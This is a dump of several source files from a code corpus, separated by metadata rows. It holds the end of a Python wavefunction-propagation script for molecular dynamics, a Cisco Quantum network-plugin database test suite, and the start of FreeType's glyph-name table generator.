elif kind == 'Phi' or kind == 'Gam' or kind == 'The':
singleStatewf = wf[:,i]
outputStringA += " {:+7.5e} ".format(norm_loss_this_step)
outputStringSP += " {:+7.5e} ".format(np.linalg.norm(singleStatewf)**2)
with open(outputFileA, "a") as oofA:
oofA.write(outputStringA + '\n')
with open(outputFileP, "a") as oofP:
oofP.write(outputStringSP + '\n')
with open(outputFile, "a") as oof:
outputStringS2 = '{} {} {} {} {} {} {} {} {} {} {} {}'
outputString2 = outputStringS2.format(counter,ii,t/41.3,1-norm_wf,fromHartoEv(kinetic.real),fromHartoEv(potential.real),fromHartoEv(total.real),fromHartoEv(initialTotal - total.real), pulZe(t,inp['pulseX']), pulZe(t,inp['pulseY']), pulZe(t,inp['pulseZ']), absorbing_potential_thing)
oof.write(outputString2 + '\n')
#####################
# on the fly graphs #
#####################
if 'graphs' in inputDict:
vmaxV = inp['vmax_value']
# I am sure there is a better way to do this...
if kind == 'Phi':
valuesX = inp['phis']
label = 'Phi {:11.4f}'.format(t/41.3)
elif kind == 'Gam':
valuesX = inp['gams']
label = 'Gam {:11.4f}'.format(t/41.3)
pot=inp['potCube'][0]
elif kind == 'The':
valuesX = inp['thes']
label = 'The {:11.4f}'.format(t/41.3)
if kind == 'Phi' or kind == 'Gam' or kind == 'The':
graphFileName = name + ".png"
makeJustAnother2DgraphComplexSINGLE(valuesX,wf,graphFileName,label)
if kind == 'GamThe':
for i in range(nstates):
for j in range(i+1): # In python the handshakes are like this...
graphFileName = '{}_state_{}_{}.png'.format(name,i,j)
heatMap2dWavefunction(wf[:,:,i],wf[:,:,j],graphFileName,t/41.3,vmaxV)
def forcehere(vec,ind,h=None):
'''
calculates the numerical force at point at index index
vector :: np.array(double)
index :: Int
'''
if h == None:
warning('dimensionality is not clear')
h = 1
num = (-vec[ind-2]+16*vec[ind-1]-30*vec[ind]+16*vec[ind+1]-vec[ind+2])
denom = 12 * h**2
return(num/denom)
def initialCondition3d(wf, dataDict, factor=None, displ=None, init_mom=None):
'''
calculates the initial condition WV
wf :: np.array(phiL,gamL,theL) Complex
datadict :: Dictionary {}
'''
good('Initial condition printing')
# Take equilibrium points
#gsm_phi_ind = dataDict['phis'].index('P000-000')
#gsm_gam_ind = dataDict['gams'].index('P016-923')
#gsm_the_ind = dataDict['thes'].index('P114-804')
gsm_phi_ind = 29
gsm_gam_ind = 28
gsm_the_ind = 55
warning('Equilibrium points put by hand: {} {} {}'.format(gsm_phi_ind,gsm_gam_ind,gsm_the_ind))
# Take values array from labels
phis,gams,thes = fromLabelsToFloats(dataDict)
# take step
dphi = phis[0] - phis[1]
dgam = gams[0] - gams[1]
dthe = thes[0] - thes[1]
# take range
range_phi = phis[-1] - phis[0]
range_gam = gams[-1] - gams[0]
range_the = thes[-1] - thes[0]
# slice out the parabolas at equilibrium geometry
pot = dataDict['potCube']
parabola_phi = pot[:,gsm_gam_ind,gsm_the_ind,0]
parabola_gam = pot[gsm_phi_ind,:,gsm_the_ind,0]
parabola_the = pot[gsm_phi_ind,gsm_gam_ind,:,0]
# calculate force with finite difference # WATCH OUT RADIANS AND ANGLES HERE
force_phi = forcehere(parabola_phi, gsm_phi_ind, h=dphi)
force_gam = forcehere(parabola_gam, gsm_gam_ind, h=dgam)
force_the = forcehere(parabola_the, gsm_the_ind, h=dthe)
# Now, I want the coefficients of the second derivative of the kinetic energy jacobian
# for the equilibrium geometry, so that I can calculate the gaussian.
# in the diagonal approximation those are the diagonal elements, thus element 0,4,8.
coe_phi = dataDict['kinCube'][gsm_phi_ind,gsm_gam_ind,gsm_the_ind,0,2]
coe_gam = dataDict['kinCube'][gsm_phi_ind,gsm_gam_ind,gsm_the_ind,4,2]
# these three lines are here because we wanted to debug Gamma
#coe_gam = dataDict['kinCube'][gsm_phi_ind,gsm_gam_ind,gsm_the_ind,0,2]
#warning('coe_gam has been changed !!! in initialcondition function')
coe_the = dataDict['kinCube'][gsm_phi_ind,gsm_gam_ind,gsm_the_ind,8,2]
# they need to be multiplied by (-2 * hbar**2), where hbar is 1. And inverted, because the MASS
# is at denominator, and we kind of want the mass...
G_phi = 1 / ( -2 * coe_phi )
G_gam = 1 / ( -2 * coe_gam )
G_the = 1 / ( -2 * coe_the )
# factor is just to wide the gaussian a little bit leave it to one.
factor = factor or 1
if factor != 1:
warning('You have a factor of {} enabled on initial condition'.format(factor))
G_phi = G_phi/factor
G_gam = G_gam/factor
G_the = G_the/factor
Gw_phi = np.sqrt(force_phi*G_phi)
Gw_gam = np.sqrt(force_gam*G_gam)
Gw_the = np.sqrt(force_the*G_the)
w_phi = np.sqrt(force_phi/G_phi)
w_gam = np.sqrt(force_gam/G_gam)
w_the = np.sqrt(force_the/G_the)
# displacements from equilibrium geometry
displ = displ or (0,0,0)
displPhi,displGam,displThe = displ
if displPhi != 0 or displGam != 0 or displThe != 0:
warning('Some displacements activated | Phi {} | Gam {} | The {}'.format(displPhi,displGam,displThe))
phi0 = phis[displPhi]
gam0 = gams[displGam]
the0 = thes[displThe]
# initial moments?
init_mom = init_mom or (0, 0, 0)
init_momPhi, init_momGam, init_momThe = init_mom
if init_momPhi != 0 or init_momGam != 0 or init_momThe != 0:
warning('Some inititial moment is activated | Phi {} | Gam {} | The {}'.format(init_momPhi,init_momGam,init_momThe))
for p, phi in enumerate(phis):
phiV = gaussian2(phi, phi0, Gw_phi, init_momPhi)
for g, gam in enumerate(gams):
gamV = gaussian2(gam, gam0, Gw_gam, init_momGam)
for t , the in enumerate(thes):
theV = gaussian2(the, the0, Gw_the, init_momThe)
#print('I: {}\tV: {}\tZ: {}\tG: {}\t'.format(t,the,the0,theV))
wf[p,g,t] = phiV * gamV * theV
norm_wf = np.linalg.norm(wf)
print('NORM before normalization: {:e}'.format(norm_wf))
print('Steps: phi({:.3f}) gam({:.3f}) the({:.3f})'.format(dphi,dgam,dthe))
print('Range: phi({:.3f}) gam({:.3f}) the({:.3f})'.format(range_phi,range_gam,range_the))
wf = wf / norm_wf
print(wf.shape)
print('\n\nparabola force constant: {:e} {:e} {:e}'.format(force_phi,force_gam,force_the))
print('values on Jacobian 2nd derivative: {:e} {:e} {:e}'.format(coe_phi,coe_gam,coe_the))
print('G: {:e} {:e} {:e}'.format(G_phi,G_gam,G_the))
print('Gw: {:e} {:e} {:e}'.format(Gw_phi,Gw_gam,Gw_the))
print('w: {:e} {:e} {:e}'.format(w_phi,w_gam,w_the))
print('cm-1: {:e} {:e} {:e}'.format(fromHartreetoCmMin1(w_phi),
fromHartreetoCmMin1(w_gam),
fromHartreetoCmMin1(w_the)))
print('fs: {:e} {:e} {:e}'.format(fromCmMin1toFs(w_phi),
fromCmMin1toFs(w_gam),
fromCmMin1toFs(w_the)))
return(wf)
def main():
fn1 = '/home/alessio/Desktop/a-3dScanSashaSupport/n-Propagation/input.yml'
inputAU = bring_input_to_AU(loadInputYAML(fn1))
if 'dataFile' in inputAU:
name_data_file = inputAU['dataFile']
# LAUNCH THE PROPAGATION, BITCH
if name_data_file[-3:] == 'npy':
data = np.load(name_data_file)
# [()] <- because np.load returns a numpy wrapper on the dictionary
dictionary_data = data[()]
propagate3D(dictionary_data, inputAU)
elif name_data_file[-3:] == 'kle':
with open(name_data_file, "rb") as input_file:
dictionary_data = pickle.load(input_file)
propagate3D(dictionary_data, inputAU)
if __name__ == "__main__":
import cProfile
cProfile.run('main()', sort='time')
| gpl-3.0 | 6,964,923,245,122,360,000 | 41.016349 | 328 | 0.576621 | false |
yamt/neutron | quantum/plugins/cisco/tests/unit/test_database.py | 1 | 25556 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011, Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Rohit Agarwalla, Cisco Systems, Inc.
"""
test_database.py is an independent test suite
that tests the database api method calls
"""
from quantum.openstack.common import log as logging
import quantum.plugins.cisco.db.api as db
import quantum.plugins.cisco.db.l2network_db as l2network_db
import quantum.plugins.cisco.db.nexus_db_v2 as nexus_db
from quantum.tests import base
LOG = logging.getLogger(__name__)
class NexusDB(object):
"""Class consisting of methods to call nexus db methods."""
def get_all_nexusportbindings(self):
"""Get all nexus port bindings."""
bindings = []
try:
for bind in nexus_db.get_all_nexusport_bindings():
LOG.debug("Getting nexus port binding : %s" % bind.port_id)
bind_dict = {}
bind_dict["port-id"] = str(bind.port_id)
bind_dict["vlan-id"] = str(bind.vlan_id)
bindings.append(bind_dict)
except Exception as exc:
LOG.error("Failed to get all bindings: %s" % str(exc))
return bindings
def get_nexusportbinding(self, vlan_id):
"""Get nexus port binding."""
binding = []
try:
for bind in nexus_db.get_nexusport_binding(vlan_id):
LOG.debug("Getting nexus port binding : %s" % bind.port_id)
bind_dict = {}
bind_dict["port-id"] = str(bind.port_id)
bind_dict["vlan-id"] = str(bind.vlan_id)
binding.append(bind_dict)
except Exception as exc:
LOG.error("Failed to get all bindings: %s" % str(exc))
return binding
def create_nexusportbinding(self, port_id, vlan_id):
"""Create nexus port binding."""
bind_dict = {}
try:
res = nexus_db.add_nexusport_binding(port_id, vlan_id)
LOG.debug("Created nexus port binding : %s" % res.port_id)
bind_dict["port-id"] = str(res.port_id)
bind_dict["vlan-id"] = str(res.vlan_id)
return bind_dict
except Exception as exc:
LOG.error("Failed to create nexus binding: %s" % str(exc))
def delete_nexusportbinding(self, vlan_id):
"""Delete nexus port binding."""
bindings = []
try:
bind = nexus_db.remove_nexusport_binding(vlan_id)
for res in bind:
LOG.debug("Deleted nexus port binding: %s" % res.vlan_id)
bind_dict = {}
bind_dict["port-id"] = res.port_id
bindings.append(bind_dict)
return bindings
except Exception as exc:
raise Exception("Failed to delete nexus port binding: %s"
% str(exc))
def update_nexusport_binding(self, port_id, new_vlan_id):
"""Update nexus port binding."""
try:
res = nexus_db.update_nexusport_binding(port_id, new_vlan_id)
LOG.debug("Updating nexus port binding : %s" % res.port_id)
bind_dict = {}
bind_dict["port-id"] = str(res.port_id)
bind_dict["vlan-id"] = str(res.vlan_id)
return bind_dict
except Exception as exc:
raise Exception("Failed to update nexus port binding vnic: %s"
% str(exc))
class L2networkDB(object):
"""Class conisting of methods to call L2network db methods."""
def get_all_vlan_bindings(self):
"""Get all vlan binding into a list of dict."""
vlans = []
try:
for vlan_bind in l2network_db.get_all_vlan_bindings():
LOG.debug("Getting vlan bindings for vlan: %s" %
vlan_bind.vlan_id)
vlan_dict = {}
vlan_dict["vlan-id"] = str(vlan_bind.vlan_id)
vlan_dict["vlan-name"] = vlan_bind.vlan_name
vlan_dict["net-id"] = str(vlan_bind.network_id)
vlans.append(vlan_dict)
except Exception as exc:
LOG.error("Failed to get all vlan bindings: %s" % str(exc))
return vlans
def get_vlan_binding(self, network_id):
"""Get a vlan binding."""
vlan = []
try:
for vlan_bind in l2network_db.get_vlan_binding(network_id):
LOG.debug("Getting vlan binding for vlan: %s" %
vlan_bind.vlan_id)
vlan_dict = {}
vlan_dict["vlan-id"] = str(vlan_bind.vlan_id)
vlan_dict["vlan-name"] = vlan_bind.vlan_name
vlan_dict["net-id"] = str(vlan_bind.network_id)
vlan.append(vlan_dict)
except Exception as exc:
LOG.error("Failed to get vlan binding: %s" % str(exc))
return vlan
def create_vlan_binding(self, vlan_id, vlan_name, network_id):
"""Create a vlan binding."""
vlan_dict = {}
try:
res = l2network_db.add_vlan_binding(vlan_id, vlan_name, network_id)
LOG.debug("Created vlan binding for vlan: %s" % res.vlan_id)
vlan_dict["vlan-id"] = str(res.vlan_id)
vlan_dict["vlan-name"] = res.vlan_name
vlan_dict["net-id"] = str(res.network_id)
return vlan_dict
except Exception as exc:
LOG.error("Failed to create vlan binding: %s" % str(exc))
def delete_vlan_binding(self, network_id):
"""Delete a vlan binding."""
try:
res = l2network_db.remove_vlan_binding(network_id)
LOG.debug("Deleted vlan binding for vlan: %s" % res.vlan_id)
vlan_dict = {}
vlan_dict["vlan-id"] = str(res.vlan_id)
return vlan_dict
except Exception as exc:
raise Exception("Failed to delete vlan binding: %s" % str(exc))
def update_vlan_binding(self, network_id, vlan_id, vlan_name):
"""Update a vlan binding."""
try:
res = l2network_db.update_vlan_binding(network_id, vlan_id,
vlan_name)
LOG.debug("Updating vlan binding for vlan: %s" % res.vlan_id)
vlan_dict = {}
vlan_dict["vlan-id"] = str(res.vlan_id)
vlan_dict["vlan-name"] = res.vlan_name
vlan_dict["net-id"] = str(res.network_id)
return vlan_dict
except Exception as exc:
raise Exception("Failed to update vlan binding: %s" % str(exc))
class QuantumDB(object):
"""Class conisting of methods to call Quantum db methods."""
def get_all_networks(self, tenant_id):
"""Get all networks."""
nets = []
try:
for net in db.network_list(tenant_id):
LOG.debug("Getting network: %s" % net.uuid)
net_dict = {}
net_dict["tenant-id"] = net.tenant_id
net_dict["net-id"] = str(net.uuid)
net_dict["net-name"] = net.name
nets.append(net_dict)
except Exception as exc:
LOG.error("Failed to get all networks: %s" % str(exc))
return nets
def get_network(self, network_id):
"""Get a network."""
net = []
try:
for net in db.network_get(network_id):
LOG.debug("Getting network: %s" % net.uuid)
net_dict = {}
net_dict["tenant-id"] = net.tenant_id
net_dict["net-id"] = str(net.uuid)
net_dict["net-name"] = net.name
net.append(net_dict)
except Exception as exc:
LOG.error("Failed to get network: %s" % str(exc))
return net
def create_network(self, tenant_id, net_name):
"""Create a network."""
net_dict = {}
try:
res = db.network_create(tenant_id, net_name)
LOG.debug("Created network: %s" % res.uuid)
net_dict["tenant-id"] = res.tenant_id
net_dict["net-id"] = str(res.uuid)
net_dict["net-name"] = res.name
return net_dict
except Exception as exc:
LOG.error("Failed to create network: %s" % str(exc))
def delete_network(self, net_id):
"""Delete a network."""
try:
net = db.network_destroy(net_id)
LOG.debug("Deleted network: %s" % net.uuid)
net_dict = {}
net_dict["net-id"] = str(net.uuid)
return net_dict
except Exception as exc:
raise Exception("Failed to delete port: %s" % str(exc))
def update_network(self, tenant_id, net_id, **kwargs):
"""Update a network."""
try:
net = db.network_update(net_id, tenant_id, **kwargs)
LOG.debug("Updated network: %s" % net.uuid)
net_dict = {}
net_dict["net-id"] = str(net.uuid)
net_dict["net-name"] = net.name
return net_dict
except Exception as exc:
raise Exception("Failed to update network: %s" % str(exc))
def get_all_ports(self, net_id):
"""Get all ports."""
ports = []
try:
for port in db.port_list(net_id):
LOG.debug("Getting port: %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
port_dict["net"] = port.network
ports.append(port_dict)
return ports
except Exception as exc:
LOG.error("Failed to get all ports: %s" % str(exc))
def get_port(self, net_id, port_id):
"""Get a port."""
port_list = []
port = db.port_get(net_id, port_id)
try:
LOG.debug("Getting port: %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
port_list.append(port_dict)
return port_list
except Exception as exc:
LOG.error("Failed to get port: %s" % str(exc))
def create_port(self, net_id):
"""Add a port."""
port_dict = {}
try:
port = db.port_create(net_id)
LOG.debug("Creating port %s" % port.uuid)
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
return port_dict
except Exception as exc:
LOG.error("Failed to create port: %s" % str(exc))
def delete_port(self, net_id, port_id):
"""Delete a port."""
try:
port = db.port_destroy(net_id, port_id)
LOG.debug("Deleted port %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
return port_dict
except Exception as exc:
raise Exception("Failed to delete port: %s" % str(exc))
def update_port(self, net_id, port_id, port_state):
"""Update a port."""
try:
port = db.port_set_state(net_id, port_id, port_state)
LOG.debug("Updated port %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
return port_dict
except Exception as exc:
raise Exception("Failed to update port state: %s" % str(exc))
def plug_interface(self, net_id, port_id, int_id):
"""Plug interface to a port."""
try:
port = db.port_set_attachment(net_id, port_id, int_id)
LOG.debug("Attached interface to port %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
return port_dict
except Exception as exc:
raise Exception("Failed to plug interface: %s" % str(exc))
def unplug_interface(self, net_id, port_id):
"""Unplug interface to a port."""
try:
port = db.port_unset_attachment(net_id, port_id)
LOG.debug("Detached interface from port %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
return port_dict
except Exception as exc:
raise Exception("Failed to unplug interface: %s" % str(exc))
class NexusDBTest(base.BaseTestCase):
"""Class conisting of nexus DB unit tests."""
def setUp(self):
super(NexusDBTest, self).setUp()
"""Setup for nexus db tests."""
l2network_db.initialize()
self.addCleanup(db.clear_db)
self.dbtest = NexusDB()
LOG.debug("Setup")
def testa_create_nexusportbinding(self):
"""Create nexus port binding."""
binding1 = self.dbtest.create_nexusportbinding("port1", 10)
self.assertTrue(binding1["port-id"] == "port1")
self.tearDown_nexusportbinding()
def testb_getall_nexusportbindings(self):
"""Get all nexus port bindings."""
self.dbtest.create_nexusportbinding("port1", 10)
self.dbtest.create_nexusportbinding("port2", 10)
bindings = self.dbtest.get_all_nexusportbindings()
count = 0
for bind in bindings:
if "port" in bind["port-id"]:
count += 1
self.assertTrue(count == 2)
self.tearDown_nexusportbinding()
def testc_delete_nexusportbinding(self):
"""Delete nexus port binding."""
self.dbtest.create_nexusportbinding("port1", 10)
self.dbtest.delete_nexusportbinding(10)
bindings = self.dbtest.get_all_nexusportbindings()
count = 0
for bind in bindings:
if "port " in bind["port-id"]:
count += 1
self.assertTrue(count == 0)
self.tearDown_nexusportbinding()
def testd_update_nexusportbinding(self):
"""Update nexus port binding."""
binding1 = self.dbtest.create_nexusportbinding("port1", 10)
binding1 = self.dbtest.update_nexusport_binding(binding1["port-id"],
20)
bindings = self.dbtest.get_all_nexusportbindings()
count = 0
for bind in bindings:
if "20" in str(bind["vlan-id"]):
count += 1
self.assertTrue(count == 1)
self.tearDown_nexusportbinding()
def tearDown_nexusportbinding(self):
"""Tear down nexus port binding table."""
LOG.debug("Tearing Down Nexus port Bindings")
binds = self.dbtest.get_all_nexusportbindings()
for bind in binds:
vlan_id = bind["vlan-id"]
self.dbtest.delete_nexusportbinding(vlan_id)
class L2networkDBTest(base.BaseTestCase):
"""Class conisting of L2network DB unit tests."""
def setUp(self):
"""Setup for tests."""
super(L2networkDBTest, self).setUp()
l2network_db.initialize()
self.dbtest = L2networkDB()
self.quantum = QuantumDB()
self.addCleanup(db.clear_db)
LOG.debug("Setup")
def testa_create_vlanbinding(self):
"""Test add vlan binding."""
net1 = self.quantum.create_network("t1", "netid1")
vlan1 = self.dbtest.create_vlan_binding(10, "vlan1", net1["net-id"])
self.assertTrue(vlan1["vlan-id"] == "10")
self.teardown_vlanbinding()
self.teardown_network()
def testb_getall_vlanbindings(self):
"""Test get all vlan bindings."""
net1 = self.quantum.create_network("t1", "netid1")
net2 = self.quantum.create_network("t1", "netid2")
vlan1 = self.dbtest.create_vlan_binding(10, "vlan1", net1["net-id"])
self.assertTrue(vlan1["vlan-id"] == "10")
vlan2 = self.dbtest.create_vlan_binding(20, "vlan2", net2["net-id"])
self.assertTrue(vlan2["vlan-id"] == "20")
vlans = self.dbtest.get_all_vlan_bindings()
count = 0
for vlan in vlans:
if "vlan" in vlan["vlan-name"]:
count += 1
self.assertTrue(count == 2)
self.teardown_vlanbinding()
self.teardown_network()
def testc_delete_vlanbinding(self):
"""Test delete vlan binding."""
net1 = self.quantum.create_network("t1", "netid1")
vlan1 = self.dbtest.create_vlan_binding(10, "vlan1", net1["net-id"])
self.assertTrue(vlan1["vlan-id"] == "10")
self.dbtest.delete_vlan_binding(net1["net-id"])
vlans = self.dbtest.get_all_vlan_bindings()
count = 0
for vlan in vlans:
if "vlan " in vlan["vlan-name"]:
count += 1
self.assertTrue(count == 0)
self.teardown_vlanbinding()
self.teardown_network()
def testd_update_vlanbinding(self):
"""Test update vlan binding."""
net1 = self.quantum.create_network("t1", "netid1")
vlan1 = self.dbtest.create_vlan_binding(10, "vlan1", net1["net-id"])
self.assertTrue(vlan1["vlan-id"] == "10")
vlan1 = self.dbtest.update_vlan_binding(net1["net-id"], 11, "newvlan1")
vlans = self.dbtest.get_all_vlan_bindings()
count = 0
for vlan in vlans:
if "new" in vlan["vlan-name"]:
count += 1
self.assertTrue(count == 1)
self.teardown_vlanbinding()
self.teardown_network()
def testm_test_vlanids(self):
"""Test vlanid methods."""
l2network_db.create_vlanids()
vlanids = l2network_db.get_all_vlanids()
self.assertTrue(len(vlanids) > 0)
vlanid = l2network_db.reserve_vlanid()
used = l2network_db.is_vlanid_used(vlanid)
self.assertTrue(used)
used = l2network_db.release_vlanid(vlanid)
self.assertFalse(used)
#counting on default teardown here to clear db
def teardown_network(self):
"""tearDown Network table."""
LOG.debug("Tearing Down Network")
nets = self.quantum.get_all_networks("t1")
for net in nets:
netid = net["net-id"]
self.quantum.delete_network(netid)
def teardown_port(self):
"""tearDown Port table."""
LOG.debug("Tearing Down Port")
nets = self.quantum.get_all_networks("t1")
for net in nets:
netid = net["net-id"]
ports = self.quantum.get_all_ports(netid)
for port in ports:
portid = port["port-id"]
self.quantum.delete_port(netid, portid)
def teardown_vlanbinding(self):
"""tearDown VlanBinding table."""
LOG.debug("Tearing Down Vlan Binding")
vlans = self.dbtest.get_all_vlan_bindings()
for vlan in vlans:
netid = vlan["net-id"]
self.dbtest.delete_vlan_binding(netid)
class QuantumDBTest(base.BaseTestCase):
"""Class conisting of Quantum DB unit tests."""
def setUp(self):
"""Setup for tests."""
super(QuantumDBTest, self).setUp()
l2network_db.initialize()
self.addCleanup(db.clear_db)
self.dbtest = QuantumDB()
self.tenant_id = "t1"
LOG.debug("Setup")
def testa_create_network(self):
"""Test to create network."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
self.assertTrue(net1["net-name"] == "plugin_test1")
self.teardown_network_port()
def testb_get_networks(self):
"""Test to get all networks."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
self.assertTrue(net1["net-name"] == "plugin_test1")
net2 = self.dbtest.create_network(self.tenant_id, "plugin_test2")
self.assertTrue(net2["net-name"] == "plugin_test2")
nets = self.dbtest.get_all_networks(self.tenant_id)
count = 0
for net in nets:
if "plugin_test" in net["net-name"]:
count += 1
self.assertTrue(count == 2)
self.teardown_network_port()
def testc_delete_network(self):
"""Test to delete network."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
self.assertTrue(net1["net-name"] == "plugin_test1")
self.dbtest.delete_network(net1["net-id"])
nets = self.dbtest.get_all_networks(self.tenant_id)
count = 0
for net in nets:
if "plugin_test1" in net["net-name"]:
count += 1
self.assertTrue(count == 0)
self.teardown_network_port()
def testd_update_network(self):
"""Test to update (rename) network."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
self.assertTrue(net1["net-name"] == "plugin_test1")
net = self.dbtest.update_network(self.tenant_id, net1["net-id"],
name="plugin_test1_renamed")
self.assertTrue(net["net-name"] == "plugin_test1_renamed")
self.teardown_network_port()
def teste_create_port(self):
"""Test to create port."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
port = self.dbtest.create_port(net1["net-id"])
self.assertTrue(port["net-id"] == net1["net-id"])
ports = self.dbtest.get_all_ports(net1["net-id"])
count = 0
for por in ports:
count += 1
self.assertTrue(count == 1)
self.teardown_network_port()
def testf_delete_port(self):
"""Test to delete port."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
port = self.dbtest.create_port(net1["net-id"])
self.assertTrue(port["net-id"] == net1["net-id"])
ports = self.dbtest.get_all_ports(net1["net-id"])
count = 0
for por in ports:
count += 1
self.assertTrue(count == 1)
for por in ports:
self.dbtest.delete_port(net1["net-id"], por["port-id"])
ports = self.dbtest.get_all_ports(net1["net-id"])
count = 0
for por in ports:
count += 1
self.assertTrue(count == 0)
self.teardown_network_port()
def testg_plug_unplug_interface(self):
"""Test to plug/unplug interface."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
port1 = self.dbtest.create_port(net1["net-id"])
self.dbtest.plug_interface(net1["net-id"], port1["port-id"], "vif1.1")
port = self.dbtest.get_port(net1["net-id"], port1["port-id"])
self.assertTrue(port[0]["int-id"] == "vif1.1")
self.dbtest.unplug_interface(net1["net-id"], port1["port-id"])
port = self.dbtest.get_port(net1["net-id"], port1["port-id"])
self.assertTrue(port[0]["int-id"] is None)
self.teardown_network_port()
def testh_joined_test(self):
"""Test to get network and port."""
net1 = self.dbtest.create_network("t1", "net1")
port1 = self.dbtest.create_port(net1["net-id"])
self.assertTrue(port1["net-id"] == net1["net-id"])
port2 = self.dbtest.create_port(net1["net-id"])
self.assertTrue(port2["net-id"] == net1["net-id"])
ports = self.dbtest.get_all_ports(net1["net-id"])
for port in ports:
net = port["net"]
LOG.debug("Port id %s Net id %s" % (port["port-id"], net.uuid))
self.teardown_joined_test()
def teardown_network_port(self):
"""tearDown for Network and Port table."""
networks = self.dbtest.get_all_networks(self.tenant_id)
for net in networks:
netid = net["net-id"]
name = net["net-name"]
if "plugin_test" in name:
ports = self.dbtest.get_all_ports(netid)
for por in ports:
self.dbtest.delete_port(netid, por["port-id"])
self.dbtest.delete_network(netid)
def teardown_joined_test(self):
"""tearDown for joined Network and Port test."""
LOG.debug("Tearing Down Network and Ports")
nets = self.dbtest.get_all_networks("t1")
for net in nets:
netid = net["net-id"]
ports = self.dbtest.get_all_ports(netid)
for port in ports:
self.dbtest.delete_port(port["net-id"], port["port-id"])
self.dbtest.delete_network(netid)
| apache-2.0 | -817,420,369,707,387,600 | 38.621705 | 79 | 0.558382 | false |
clangen/projectM-musikcube | src/WinLibs/freetype-2.3.5/src/tools/glnames.py | 16 | 103307 | #!/usr/bin/env python
#
#
# FreeType 2 glyph name builder
#
# Copyright 1996-2000, 2003, 2005, 2007 by
# David Turner, Robert Wilhelm, and Werner Lemberg.
#
# This file is part of the FreeType project, and may only be used, modified,
# and distributed under the terms of the FreeType project license,
# LICENSE.TXT. By continuing to use, modify, or distribute this file you
# indicate that you have read the license and understand and accept it
# fully.
"""\
usage: %s <output-file>
This python script generates the glyph names tables defined in the
PSNames module.
Its single argument is the name of the header file to be created.
"""
import sys, string, struct, re, os.path
# This table lists the glyphs according to the Macintosh specification.
# It is used by the TrueType Postscript names table.
#
# See
#
# http://fonts.apple.com/TTRefMan/RM06/Chap6post.html
#
# for the official list.
#
mac_standard_names = \
[
# 0
".notdef", ".null", "nonmarkingreturn", "space", "exclam",
"quotedbl", "numbersign", "dollar", "percent", "ampersand",
# 10
"quotesingle", "parenleft", "parenright", "asterisk", "plus",
"comma", "hyphen", "period", "slash", "zero",
# 20
"one", "two", "three", "four", "five",
"six", "seven", "eight", "nine", "colon",
# 30
"semicolon", "less", "equal", "greater", "question",
"at", "A", "B", "C", "D",
# 40
"E", "F", "G", "H", "I",
"J", "K", "L", "M", "N",
# 50
"O", "P", "Q", "R", "S",
"T", "U", "V", "W", "X",
# 60
"Y", "Z", "bracketleft", "backslash", "bracketright",
"asciicircum", "underscore", "grave", "a", "b",
# 70
"c", "d", "e", "f", "g",
"h", "i", "j", "k", "l",
# 80
"m", "n", "o", "p", "q",
"r", "s", "t", "u", "v",
# 90
"w", "x", "y", "z", "braceleft",
"bar", "braceright", "asciitilde", "Adieresis", "Aring",
# 100
"Ccedilla", "Eacute", "Ntilde", "Odieresis", "Udieresis",
"aacute", "agrave", "acircumflex", "adieresis", "atilde",
# 110
"aring", "ccedilla", "eacute", "egrave", "ecircumflex",
"edieresis", "iacute", "igrave", "icircumflex", "idieresis",
# 120
"ntilde", "oacute", "ograve", "ocircumflex", "odieresis",
"otilde", "uacute", "ugrave", "ucircumflex", "udieresis",
# 130
"dagger", "degree", "cent", "sterling", "section",
"bullet", "paragraph", "germandbls", "registered", "copyright",
# 140
"trademark", "acute", "dieresis", "notequal", "AE",
"Oslash", "infinity", "plusminus", "lessequal", "greaterequal",
# 150
"yen", "mu", "partialdiff", "summation", "product",
"pi", "integral", "ordfeminine", "ordmasculine", "Omega",
# 160
"ae", "oslash", "questiondown", "exclamdown", "logicalnot",
"radical", "florin", "approxequal", "Delta", "guillemotleft",
# 170
"guillemotright", "ellipsis", "nonbreakingspace", "Agrave", "Atilde",
"Otilde", "OE", "oe", "endash", "emdash",
# 180
"quotedblleft", "quotedblright", "quoteleft", "quoteright", "divide",
"lozenge", "ydieresis", "Ydieresis", "fraction", "currency",
# 190
"guilsinglleft", "guilsinglright", "fi", "fl", "daggerdbl",
"periodcentered", "quotesinglbase", "quotedblbase", "perthousand",
"Acircumflex",
# 200
"Ecircumflex", "Aacute", "Edieresis", "Egrave", "Iacute",
"Icircumflex", "Idieresis", "Igrave", "Oacute", "Ocircumflex",
# 210
"apple", "Ograve", "Uacute", "Ucircumflex", "Ugrave",
"dotlessi", "circumflex", "tilde", "macron", "breve",
# 220
"dotaccent", "ring", "cedilla", "hungarumlaut", "ogonek",
"caron", "Lslash", "lslash", "Scaron", "scaron",
# 230
